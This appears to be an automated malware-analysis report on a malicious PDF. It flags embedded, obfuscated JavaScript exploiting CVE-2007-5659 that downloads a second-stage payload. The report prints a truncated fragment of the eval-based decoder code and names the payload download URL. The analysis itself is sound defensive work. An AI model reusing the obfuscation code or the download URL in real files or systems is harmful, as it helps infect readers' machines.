Verdict: MALICIOUS
Risk Score: 308
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The eval() call suggests the script is obfuscated and designed to execute arbitrary code. The presence of a suspicious extracted artifact named 'javascript_obj0013_001.js' further supports this. The script's likely intent is to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (8)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (Identified after JavaScript deobfuscation.)
- JavaScript action (low, 3 related findings, rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:

      function Pre8Q3W4Vp25mp(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function G2SWYU(PzCsG0){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(PzCsG0)"+";"+"}");eval("function hrLXkd(F8HjbwXB){var nPsYrax="+"0,eAkPa5K65=F8HjbwXB.l"+"en"+"gth,m1iuOrm=10"+"2"+"4,OWO3pWKZ8,wJOWT9,sCGAH='',hHZLgQ8Qp=nPsYrax,ArTKC4ST0lrfF=nPsYrax,XKCrUUivlHH=nPsYrax,EPsW4hOX3baU=Ar"+"ra"+"y(63,14,26,46,18,42,20,30,28,54,0,0,0,0,0, …

- PDF exploit shellcode contains an embedded download URL (high, rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low, rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high, rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium, rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://abb192.cn/spl3/load.php?id=18&spl=4 (referenced by PDF JavaScript).
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x36C | 6377 bytes |

SHA-256: 4a2fda3c7d0f099cb5ea427c2d4577e1cd156a020232e08d4f8893f80043ac27
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 4 eval/decoder/string-building token(s). 126 of 218 identifiers look randomly generated (e.g. 'd6UGLCUkdCUkXC4nsbMXzBZeHz'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script: first 1,000 lines of the extracted script
| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x36C | 2588 bytes |

SHA-256: d5ba8bb4095d5f85024df1caa610fcf22e133769a0796a06b68615d14fe28e98
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script: first 1,000 lines of the extracted script